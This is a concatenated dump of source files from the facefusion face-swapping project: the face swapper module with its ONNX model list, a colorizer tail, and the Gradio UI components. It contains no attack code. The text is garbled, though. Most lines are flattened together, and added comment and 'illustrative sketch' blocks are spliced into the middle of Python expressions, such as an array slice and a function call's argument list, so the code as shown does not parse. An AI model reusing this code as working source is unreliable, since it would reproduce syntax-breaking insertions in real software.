        color_vision_frame = cv2.cvtColor(color_vision_frame, cv2.COLOR_BGR2RGB).astype(numpy.uint8)
        color_vision_frame = cv2.cvtColor(color_vision_frame, cv2.COLOR_BGR2LAB)
        _, color_green_channel, color_red_channel = cv2.split(color_vision_frame)
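        # Added note: cv2.split on the LAB-converted output yields (L, A, B) despite the
        # green/red variable names; the merge below appears to reuse the blue channel of the
        # (near-grayscale) input frame as the lightness channel and keeps only the two chroma
        # channels from the model output before converting back from LAB to BGR.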
color_vision_frame = cv2.merge((temp_blue_channel, color_green_channel, color_red_channel)) color_vision_frame = cv2.cvtColor(color_vision_frame, cv2.COLOR_LAB2BGR) return color_vision_frame def blend_frame(temp_vision_frame : VisionFrame, paste_vision_frame : VisionFrame) -> VisionFrame: frame_colorizer_blend = 1 - (frame_processors_globals.frame_colorizer_blend / 100) temp_vision_frame = cv2.addWeighted(temp_vision_frame, frame_colorizer_blend, paste_vision_frame, 1 - frame_colorizer_blend, 0) return temp_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: pass def process_frame(inputs : FrameColorizerInputs) -> VisionFrame: target_vision_frame = inputs.get('target_vision_frame') return colorize_frame(target_vision_frame) def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(None, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/face_swapper.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import numpy import onnx import onnxruntime from onnx import numpy_helper import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.execution import has_execution_provider, apply_execution_provider_options from facefusion.face_analyser import get_one_face, get_average_face, get_many_faces, find_similar_faces, clear_face_analyser from facefusion.face_masker import create_static_box_mask, create_occlusion_mask, create_region_mask, clear_face_occluder, clear_face_parser from facefusion.face_helper import warp_face_by_face_landmark_5, paste_back from facefusion.face_store import get_reference_faces from facefusion.content_analyser import clear_content_analyser from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import Face, Embedding, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, QueuePayload from facefusion.filesystem import is_file, is_image, has_image, is_video, filter_image_paths, resolve_relative_path from facefusion.download import conditional_download, is_download_done from facefusion.vision import read_image, read_static_image, read_static_images, write_image from facefusion.processors.frame.typings import FaceSwapperInputs from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None MODEL_INITIALIZER = None NAME = __name__.upper() MODELS : ModelSet =\ { 'blendswap_256': { 'type': 'blendswap', 'url': 
'https://github.com/facefusion/facefusion-assets/releases/download/models/blendswap_256.onnx', 'path': resolve_relative_path('../.assets/models/blendswap_256.onnx'), 'template': 'ffhq_512', 'size': (256, 256), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] }, 'inswapper_128': { 'type': 'inswapper', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/inswapper_128.onnx', 'path': resolve_relative_path('../.assets/models/inswapper_128.onnx'), 'template': 'arcface_128_v2', 'size': (128, 128), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] }, 'inswapper_128_fp16': { 'type': 'inswapper', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/inswapper_128_fp16.onnx', 'path': resolve_relative_path('../.assets/models/inswapper_128_fp16.onnx'), 'template': 'arcface_128_v2', 'size': (128, 128), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] }, 'simswap_256': { 'type': 'simswap', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/simswap_256.onnx', 'path': resolve_relative_path('../.assets/models/simswap_256.onnx'), 'template': 'arcface_112_v1', 'size': (256, 256), 'mean': [ 0.485, 0.456, 0.406 ], 'standard_deviation': [ 0.229, 0.224, 0.225 ] }, 'simswap_512_unofficial': { 'type': 'simswap', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/simswap_512_unofficial.onnx', 'path': resolve_relative_path('../.assets/models/simswap_512_unofficial.onnx'), 'template': 'arcface_112_v1', 'size': (512, 512), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] }, 'uniface_256': { 'type': 'uniface', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/uniface_256.onnx', 'path': resolve_relative_path('../.assets/models/uniface_256.onnx'), 'template': 'ffhq_512', 'size': (256, 256), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_model_initializer() -> Any: global MODEL_INITIALIZER with thread_lock(): while process_manager.is_checking(): sleep(0.5) if MODEL_INITIALIZER is None: model_path = get_options('model').get('path') model = onnx.load(model_path) MODEL_INITIALIZER = numpy_helper.to_array(model.graph.initializer[-1]) return MODEL_INITIALIZER def clear_model_initializer() -> None: global MODEL_INITIALIZER MODEL_INITIALIZER = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.face_swapper_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: if has_execution_provider('CoreMLExecutionProvider') or has_execution_provider('OpenVINOExecutionProvider'): face_swapper_model_fallback = 'inswapper_128' else: face_swapper_model_fallback = 'inswapper_128_fp16' program.add_argument('--face-swapper-model', help = 
wording.get('help.face_swapper_model'), default = config.get_str_value('frame_processors.face_swapper_model', face_swapper_model_fallback), choices = frame_processors_choices.face_swapper_models) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.face_swapper_model = args.face_swapper_model if args.face_swapper_model == 'blendswap_256': facefusion.globals.face_recognizer_model = 'arcface_blendswap' if args.face_swapper_model == 'inswapper_128' or args.face_swapper_model == 'inswapper_128_fp16': facefusion.globals.face_recognizer_model = 'arcface_inswapper' if args.face_swapper_model == 'simswap_256' or args.face_swapper_model == 'simswap_512_unofficial': facefusion.globals.face_recognizer_model = 'arcface_simswap' if args.face_swapper_model == 'uniface_256': facefusion.globals.face_recognizer_model = 'arcface_uniface' def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + wording.get('exclamation_mark'), NAME) return False if not is_file(model_path): logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME) return False return True def pre_process(mode : ProcessMode) -> bool: if not has_image(facefusion.globals.source_paths): logger.error(wording.get('select_image_source') + wording.get('exclamation_mark'), NAME) return False source_image_paths = filter_image_paths(facefusion.globals.source_paths) source_frames = read_static_images(source_image_paths) for source_frame in source_frames: if not get_one_face(source_frame): logger.error(wording.get('no_source_face_detected') + wording.get('exclamation_mark'), NAME) return False if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path): logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) return False if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path): logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME) return False return True def post_process() -> None: read_static_image.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_model_initializer() clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() clear_face_occluder() clear_face_parser() def swap_face(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: model_template = get_options('model').get('template') model_size = get_options('model').get('size') crop_vision_frame, affine_matrix = warp_face_by_face_landmark_5(temp_vision_frame, target_face.landmarks.get('5/68'), model_template, model_size) crop_mask_list = [] if 'box' in facefusion.globals.face_mask_types: box_mask = create_static_box_mask(crop_vision_frame.shape[:2][::-1], 
facefusion.globals.face_mask_blur, facefusion.globals.face_mask_padding) crop_mask_list.append(box_mask) if 'occlusion' in facefusion.globals.face_mask_types: occlusion_mask = create_occlusion_mask(crop_vision_frame) crop_mask_list.append(occlusion_mask) crop_vision_frame = prepare_crop_frame(crop_vision_frame) crop_vision_frame = apply_swap(source_face, crop_vision_frame) crop_vision_frame = normalize_crop_frame(crop_vision_frame) if 'region' in facefusion.globals.face_mask_types: region_mask = create_region_mask(crop_vision_frame, facefusion.globals.face_mask_regions) crop_mask_list.append(region_mask) crop_mask = numpy.minimum.reduce(crop_mask_list).clip(0, 1) temp_vision_frame = paste_back(temp_vision_frame, crop_vision_frame, crop_mask, affine_matrix) return temp_vision_frame def apply_swap(source_face : Face, crop_vision_frame : VisionFrame) -> VisionFrame: frame_processor = get_frame_processor() model_type = get_options('model').get('type') frame_processor_inputs = {} for frame_processor_input in frame_processor.get_inputs(): if frame_processor_input.name == 'source': if model_type == 'blendswap' or model_type == 'uniface': frame_processor_inputs[frame_processor_input.name] = prepare_source_frame(source_face) else: frame_processor_inputs[frame_processor_input.name] = prepare_source_embedding(source_face) if frame_processor_input.name == 'target': frame_processor_inputs[frame_processor_input.name] = crop_vision_frame with conditional_thread_semaphore(facefusion.globals.execution_providers): crop_vision_frame = frame_processor.run(None, frame_processor_inputs)[0][0] return crop_vision_frame def prepare_source_frame(source_face : Face) -> VisionFrame: model_type = get_options('model').get('type') source_vision_frame = read_static_image(facefusion.globals.source_paths[0]) if model_type == 'blendswap': source_vision_frame, _ = warp_face_by_face_landmark_5(source_vision_frame, source_face.landmarks.get('5/68'), 'arcface_112_v2', (112, 112)) if model_type == 'uniface': source_vision_frame, _ = warp_face_by_face_landmark_5(source_vision_frame, source_face.landmarks.get('5/68'), 'ffhq_512', (256, 256)) source_vision_frame = source_vision_frame[:, :, ::-1] / 255.0 source_vision_frame = source_vision_frame.transpose(2, 0, 1) source_vision_frame = numpy.expand_dims(source_vision_frame, axis = 0).astype(numpy.float32) return source_vision_frame def prepare_source_embedding(source_face : Face) -> Embedding: model_type = get_options('model').get('type') if model_type == 'inswapper': model_initializer = get_model_initializer() source_embedding = source_face.embedding.reshape((1, -1)) source_embedding = numpy.dot(source_embedding, model_initializer) / numpy.linalg.norm(source_embedding) else: source_embedding = source_face.normed_embedding.reshape(1, -1) return source_embedding def prepare_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: model_mean = get_options('model').get('mean') model_standard_deviation = get_options('model').get('standard_deviation') crop_vision_frame = crop_vision_frame[:, :, ::-1] / 255.0 crop_vision_frame = (crop_vision_frame - model_mean) / model_standard_deviation crop_vision_frame = crop_vision_frame.transpose(2, 0, 1) crop_vision_frame = numpy.expand_dims(crop_vision_frame, axis = 0).astype(numpy.float32) return crop_vision_frame def normalize_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = crop_vision_frame.transpose(1, 2, 0) crop_vision_frame = (crop_vision_frame * 255.0).round() crop_vision_frame = crop_vision_frame[:, :, 
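# Illustrative sketch, not part of the facefusion sources: the tensor layout
# produced by prepare_crop_frame() above, shown on a dummy BGR frame with the
# 0.0 mean / 1.0 standard deviation used by most of the swapper models.
import numpy

def example_prepare_crop_frame(crop_bgr, mean, standard_deviation):
    crop = crop_bgr[:, :, ::-1] / 255.0        # BGR -> RGB, scale to [0, 1]
    crop = (crop - mean) / standard_deviation  # per-channel normalization
    crop = crop.transpose(2, 0, 1)             # HWC -> CHW
    return numpy.expand_dims(crop, axis = 0).astype(numpy.float32)  # batch of one (NCHW)

example_output = example_prepare_crop_frame(numpy.zeros((256, 256, 3)), [ 0.0, 0.0, 0.0 ], [ 1.0, 1.0, 1.0 ])
assert example_output.shape == (1, 3, 256, 256)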
::-1] return crop_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: return swap_face(source_face, target_face, temp_vision_frame) def process_frame(inputs : FaceSwapperInputs) -> VisionFrame: reference_faces = inputs.get('reference_faces') source_face = inputs.get('source_face') target_vision_frame = inputs.get('target_vision_frame') if facefusion.globals.face_selector_mode == 'many': many_faces = get_many_faces(target_vision_frame) if many_faces: for target_face in many_faces: target_vision_frame = swap_face(source_face, target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'one': target_face = get_one_face(target_vision_frame) if target_face: target_vision_frame = swap_face(source_face, target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'reference': similar_faces = find_similar_faces(reference_faces, target_vision_frame, facefusion.globals.reference_face_distance) if similar_faces: for similar_face in similar_faces: target_vision_frame = swap_face(source_face, similar_face, target_vision_frame) return target_vision_frame def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_frames = read_static_images(source_paths) source_face = get_average_face(source_frames) for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'source_face': source_face, 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_frames = read_static_images(source_paths) source_face = get_average_face(source_frames) target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'source_face': source_face, 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(source_paths, temp_frame_paths, process_frames) File: facefusion/uis/__init__.py File: facefusion/uis/core.py from typing import Dict, Optional, Any, List from types import ModuleType import os import importlib import sys import gradio import facefusion.globals from facefusion.uis import overrides from facefusion import metadata, logger, wording from facefusion.uis.typing import Component, ComponentName from facefusion.filesystem import resolve_relative_path os.environ['GRADIO_ANALYTICS_ENABLED'] = '0' gradio.processing_utils.encode_array_to_base64 = overrides.encode_array_to_base64 gradio.processing_utils.encode_pil_to_base64 = overrides.encode_pil_to_base64 UI_COMPONENTS: Dict[ComponentName, Component] = {} UI_LAYOUT_MODULES : List[ModuleType] = [] UI_LAYOUT_METHODS =\ [ 'pre_check', 'pre_render', 'render', 'listen', 'run' ] def load_ui_layout_module(ui_layout : str) -> Any: try: ui_layout_module = importlib.import_module('facefusion.uis.layouts.' 
+ ui_layout) for method_name in UI_LAYOUT_METHODS: if not hasattr(ui_layout_module, method_name): raise NotImplementedError except ModuleNotFoundError as exception: logger.error(wording.get('ui_layout_not_loaded').format(ui_layout = ui_layout), __name__.upper()) logger.debug(exception.msg, __name__.upper()) sys.exit(1) except NotImplementedError: logger.error(wording.get('ui_layout_not_implemented').format(ui_layout = ui_layout), __name__.upper()) sys.exit(1) return ui_layout_module def get_ui_layouts_modules(ui_layouts : List[str]) -> List[ModuleType]: global UI_LAYOUT_MODULES if not UI_LAYOUT_MODULES: for ui_layout in ui_layouts: ui_layout_module = load_ui_layout_module(ui_layout) UI_LAYOUT_MODULES.append(ui_layout_module) return UI_LAYOUT_MODULES def get_ui_component(component_name : ComponentName) -> Optional[Component]: if component_name in UI_COMPONENTS: return UI_COMPONENTS[component_name] return None def get_ui_components(component_names : List[ComponentName]) -> Optional[List[Component]]: ui_components = [] for component_name in component_names: component = get_ui_component(component_name) if component: ui_components.append(component) return ui_components def register_ui_component(component_name : ComponentName, component: Component) -> None: UI_COMPONENTS[component_name] = component def launch() -> None: ui_layouts_total = len(facefusion.globals.ui_layouts) with gradio.Blocks(theme = get_theme(), css = get_css(), title = metadata.get('name') + ' ' + metadata.get('version')) as ui: for ui_layout in facefusion.globals.ui_layouts: ui_layout_module = load_ui_layout_module(ui_layout) if ui_layout_module.pre_render(): if ui_layouts_total > 1: with gradio.Tab(ui_layout): ui_layout_module.render() ui_layout_module.listen() else: ui_layout_module.render() ui_layout_module.listen() for ui_layout in facefusion.globals.ui_layouts: ui_layout_module = load_ui_layout_module(ui_layout) ui_layout_module.run(ui) def get_theme() -> gradio.Theme: return gradio.themes.Base( primary_hue = gradio.themes.colors.red, secondary_hue = gradio.themes.colors.neutral, font = gradio.themes.GoogleFont('Open Sans') ).set( background_fill_primary = '*neutral_100', block_background_fill = 'white', block_border_width = '0', block_label_background_fill = '*primary_100', block_label_background_fill_dark = '*primary_600', block_label_border_width = 'none', block_label_margin = '0.5rem', block_label_radius = '*radius_md', block_label_text_color = '*primary_500', block_label_text_color_dark = 'white', block_label_text_weight = '600', block_title_background_fill = '*primary_100', block_title_background_fill_dark = '*primary_600', block_title_padding = '*block_label_padding', block_title_radius = '*block_label_radius', block_title_text_color = '*primary_500', block_title_text_size = '*text_sm', block_title_text_weight = '600', block_padding = '0.5rem', border_color_primary = 'transparent', border_color_primary_dark = 'transparent', button_large_padding = '2rem 0.5rem', button_large_text_weight = 'normal', button_primary_background_fill = '*primary_500', button_primary_text_color = 'white', button_secondary_background_fill = 'white', button_secondary_border_color = 'transparent', button_secondary_border_color_dark = 'transparent', button_secondary_border_color_hover = 'transparent', button_secondary_border_color_hover_dark = 'transparent', button_secondary_text_color = '*neutral_800', button_small_padding = '0.75rem', checkbox_background_color = '*neutral_200', checkbox_background_color_selected = '*primary_600', 
checkbox_background_color_selected_dark = '*primary_700', checkbox_border_color_focus = '*primary_500', checkbox_border_color_focus_dark = '*primary_600', checkbox_border_color_selected = '*primary_600', checkbox_border_color_selected_dark = '*primary_700', checkbox_label_background_fill = '*neutral_50', checkbox_label_background_fill_hover = '*neutral_50', checkbox_label_background_fill_selected = '*primary_500', checkbox_label_background_fill_selected_dark = '*primary_600', checkbox_label_text_color_selected = 'white', input_background_fill = '*neutral_50', shadow_drop = 'none', slider_color = '*primary_500', slider_color_dark = '*primary_600' ) def get_css() -> str: fixes_css_path = resolve_relative_path('uis/assets/fixes.css') overrides_css_path = resolve_relative_path('uis/assets/overrides.css') return open(fixes_css_path, 'r').read() + open(overrides_css_path, 'r').read() File: facefusion/uis/overrides.py from typing import Any import cv2 import numpy import base64 def encode_array_to_base64(array : numpy.ndarray[Any, Any]) -> str: buffer = cv2.imencode('.jpg', array[:, :, ::-1])[1] return 'data:image/jpeg;base64,' + base64.b64encode(buffer.tobytes()).decode('utf-8') def encode_pil_to_base64(image : Any) -> str: return encode_array_to_base64(numpy.asarray(image)[:, :, ::-1]) File: facefusion/uis/choices.py from typing import List from facefusion.uis.typing import WebcamMode common_options : List[str] = [ 'keep-temp', 'skip-audio', 'skip-download' ] webcam_modes : List[WebcamMode] = [ 'inline', 'udp', 'v4l2' ] webcam_resolutions : List[str] = [ '320x240', '640x480', '800x600', '1024x768', '1280x720', '1280x960', '1920x1080', '2560x1440', '3840x2160' ] File: facefusion/uis/typing.py from typing import Literal, Any, IO import gradio File = IO[Any] Component = gradio.File or gradio.Image or gradio.Video or gradio.Slider ComponentName = Literal\ [ 'source_audio', 'source_image', 'target_image', 'target_video', 'preview_frame_slider', 'trim_frame_start_slider', 'trim_frame_end_slider', 'face_selector_mode_dropdown', 'reference_face_position_gallery', 'reference_face_distance_slider', 'face_analyser_order_dropdown', 'face_analyser_age_dropdown', 'face_analyser_gender_dropdown', 'face_detector_model_dropdown', 'face_detector_size_dropdown', 'face_detector_score_slider', 'face_landmarker_score_slider', 'face_mask_types_checkbox_group', 'face_mask_blur_slider', 'face_mask_padding_top_slider', 'face_mask_padding_bottom_slider', 'face_mask_padding_left_slider', 'face_mask_padding_right_slider', 'face_mask_region_checkbox_group', 'frame_processors_checkbox_group', 'face_debugger_items_checkbox_group', 'face_enhancer_model_dropdown', 'face_enhancer_blend_slider', 'face_swapper_model_dropdown', 'frame_colorizer_model_dropdown', 'frame_colorizer_blend_slider', 'frame_colorizer_size_dropdown', 'frame_enhancer_model_dropdown', 'frame_enhancer_blend_slider', 'lip_syncer_model_dropdown', 'output_path_textbox', 'output_video_fps_slider', 'benchmark_runs_checkbox_group', 'benchmark_cycles_slider', 'webcam_mode_radio', 'webcam_resolution_dropdown', 'webcam_fps_slider' ] WebcamMode = Literal['inline', 'udp', 'v4l2'] StreamMode = Literal['udp', 'v4l2'] File: facefusion/uis/components/frame_processors.py from typing import List, Optional import gradio import facefusion.globals from facefusion import wording from facefusion.processors.frame.core import load_frame_processor_module, clear_frame_processors_modules from facefusion.filesystem import list_directory from facefusion.uis.core import 
register_ui_component FRAME_PROCESSORS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None def render() -> None: global FRAME_PROCESSORS_CHECKBOX_GROUP FRAME_PROCESSORS_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.frame_processors_checkbox_group'), choices = sort_frame_processors(facefusion.globals.frame_processors), value = facefusion.globals.frame_processors ) register_ui_component('frame_processors_checkbox_group', FRAME_PROCESSORS_CHECKBOX_GROUP) def listen() -> None: FRAME_PROCESSORS_CHECKBOX_GROUP.change(update_frame_processors, inputs = FRAME_PROCESSORS_CHECKBOX_GROUP, outputs = FRAME_PROCESSORS_CHECKBOX_GROUP) def update_frame_processors(frame_processors : List[str]) -> gradio.CheckboxGroup: facefusion.globals.frame_processors = frame_processors clear_frame_processors_modules() for frame_processor in frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) if not frame_processor_module.pre_check(): return gradio.CheckboxGroup() return gradio.CheckboxGroup(value = facefusion.globals.frame_processors, choices = sort_frame_processors(facefusion.globals.frame_processors)) def sort_frame_processors(frame_processors : List[str]) -> list[str]: available_frame_processors = list_directory('facefusion/processors/frame/modules') return sorted(available_frame_processors, key = lambda frame_processor : frame_processors.index(frame_processor) if frame_processor in frame_processors else len(frame_processors)) File: facefusion/uis/components/preview.py from typing import Any, Dict, Optional from time import sleep import cv2 import gradio import numpy import facefusion.globals from facefusion import logger, wording from facefusion.audio import get_audio_frame, create_empty_audio_frame from facefusion.common_helper import get_first from facefusion.core import conditional_append_reference_faces from facefusion.face_analyser import get_average_face, clear_face_analyser from facefusion.face_store import clear_static_faces, get_reference_faces, clear_reference_faces from facefusion.typing import Face, FaceSet, AudioFrame, VisionFrame from facefusion.vision import get_video_frame, count_video_frame_total, normalize_frame_color, resize_frame_resolution, read_static_image, read_static_images from facefusion.filesystem import is_image, is_video, filter_audio_paths from facefusion.content_analyser import analyse_frame from facefusion.processors.frame.core import load_frame_processor_module from facefusion.uis.core import get_ui_component, get_ui_components, register_ui_component PREVIEW_IMAGE : Optional[gradio.Image] = None PREVIEW_FRAME_SLIDER : Optional[gradio.Slider] = None def render() -> None: global PREVIEW_IMAGE global PREVIEW_FRAME_SLIDER preview_image_args : Dict[str, Any] =\ { 'label': wording.get('uis.preview_image'), 'interactive': False } preview_frame_slider_args : Dict[str, Any] =\ { 'label': wording.get('uis.preview_frame_slider'), 'step': 1, 'minimum': 0, 'maximum': 100, 'visible': False } conditional_append_reference_faces() reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_frames = read_static_images(facefusion.globals.source_paths) source_face = get_average_face(source_frames) source_audio_path = get_first(filter_audio_paths(facefusion.globals.source_paths)) source_audio_frame = create_empty_audio_frame() if source_audio_path and facefusion.globals.output_video_fps and facefusion.globals.reference_frame_number: temp_audio_frame = get_audio_frame(source_audio_path, 
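# Illustrative sketch, not part of the facefusion sources: the sort key used by
# sort_frame_processors() above keeps the selected processors first, in their
# selected order, and appends the remaining ones afterwards (stable sort).
available_example = [ 'face_debugger', 'face_enhancer', 'face_swapper', 'lip_syncer' ]
selected_example = [ 'face_swapper', 'face_enhancer' ]
sorted_example = sorted(available_example, key = lambda frame_processor : selected_example.index(frame_processor) if frame_processor in selected_example else len(selected_example))
assert sorted_example == [ 'face_swapper', 'face_enhancer', 'face_debugger', 'lip_syncer' ]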
facefusion.globals.output_video_fps, facefusion.globals.reference_frame_number) if numpy.any(temp_audio_frame): source_audio_frame = temp_audio_frame if is_image(facefusion.globals.target_path): target_vision_frame = read_static_image(facefusion.globals.target_path) preview_vision_frame = process_preview_frame(reference_faces, source_face, source_audio_frame, target_vision_frame) preview_image_args['value'] = normalize_frame_color(preview_vision_frame) if is_video(facefusion.globals.target_path): temp_vision_frame = get_video_frame(facefusion.globals.target_path, facefusion.globals.reference_frame_number) preview_vision_frame = process_preview_frame(reference_faces, source_face, source_audio_frame, temp_vision_frame) preview_image_args['value'] = normalize_frame_color(preview_vision_frame) preview_image_args['visible'] = True preview_frame_slider_args['value'] = facefusion.globals.reference_frame_number preview_frame_slider_args['maximum'] = count_video_frame_total(facefusion.globals.target_path) preview_frame_slider_args['visible'] = True PREVIEW_IMAGE = gradio.Image(**preview_image_args) PREVIEW_FRAME_SLIDER = gradio.Slider(**preview_frame_slider_args) register_ui_component('preview_frame_slider', PREVIEW_FRAME_SLIDER) def listen() -> None: PREVIEW_FRAME_SLIDER.release(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) reference_face_position_gallery = get_ui_component('reference_face_position_gallery') if reference_face_position_gallery: reference_face_position_gallery.select(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'source_audio', 'source_image', 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(update_preview_frame_slider, outputs = PREVIEW_FRAME_SLIDER) for ui_component in get_ui_components( [ 'face_debugger_items_checkbox_group', 'frame_colorizer_size_dropdown', 'face_selector_mode_dropdown', 'face_mask_types_checkbox_group', 'face_mask_region_checkbox_group', 'face_analyser_order_dropdown', 'face_analyser_age_dropdown', 'face_analyser_gender_dropdown' ]): ui_component.change(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'face_enhancer_blend_slider', 'frame_colorizer_blend_slider', 'frame_enhancer_blend_slider', 'trim_frame_start_slider', 'trim_frame_end_slider', 'reference_face_distance_slider', 'face_mask_blur_slider', 'face_mask_padding_top_slider', 'face_mask_padding_bottom_slider', 'face_mask_padding_left_slider', 'face_mask_padding_right_slider', 'output_video_fps_slider' ]): ui_component.release(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'frame_processors_checkbox_group', 'face_enhancer_model_dropdown', 'face_swapper_model_dropdown', 'frame_colorizer_model_dropdown', 'frame_enhancer_model_dropdown', 'lip_syncer_model_dropdown', 'face_detector_model_dropdown', 'face_detector_size_dropdown' ]): ui_component.change(clear_and_update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'face_detector_score_slider', 'face_landmarker_score_slider' ]): 
ui_component.release(clear_and_update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) def clear_and_update_preview_image(frame_number : int = 0) -> gradio.Image: clear_face_analyser() clear_reference_faces() clear_static_faces() return update_preview_image(frame_number) def update_preview_image(frame_number : int = 0) -> gradio.Image: for frame_processor in facefusion.globals.frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) while not frame_processor_module.post_check(): logger.disable() sleep(0.5) logger.enable() conditional_append_reference_faces() reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_frames = read_static_images(facefusion.globals.source_paths) source_face = get_average_face(source_frames) source_audio_path = get_first(filter_audio_paths(facefusion.globals.source_paths)) source_audio_frame = create_empty_audio_frame() if source_audio_path and facefusion.globals.output_video_fps and facefusion.globals.reference_frame_number: reference_audio_frame_number = facefusion.globals.reference_frame_number if facefusion.globals.trim_frame_start: reference_audio_frame_number -= facefusion.globals.trim_frame_start temp_audio_frame = get_audio_frame(source_audio_path, facefusion.globals.output_video_fps, reference_audio_frame_number) if numpy.any(temp_audio_frame): source_audio_frame = temp_audio_frame if is_image(facefusion.globals.target_path): target_vision_frame = read_static_image(facefusion.globals.target_path) preview_vision_frame = process_preview_frame(reference_faces, source_face, source_audio_frame, target_vision_frame) preview_vision_frame = normalize_frame_color(preview_vision_frame) return gradio.Image(value = preview_vision_frame) if is_video(facefusion.globals.target_path): temp_vision_frame = get_video_frame(facefusion.globals.target_path, frame_number) 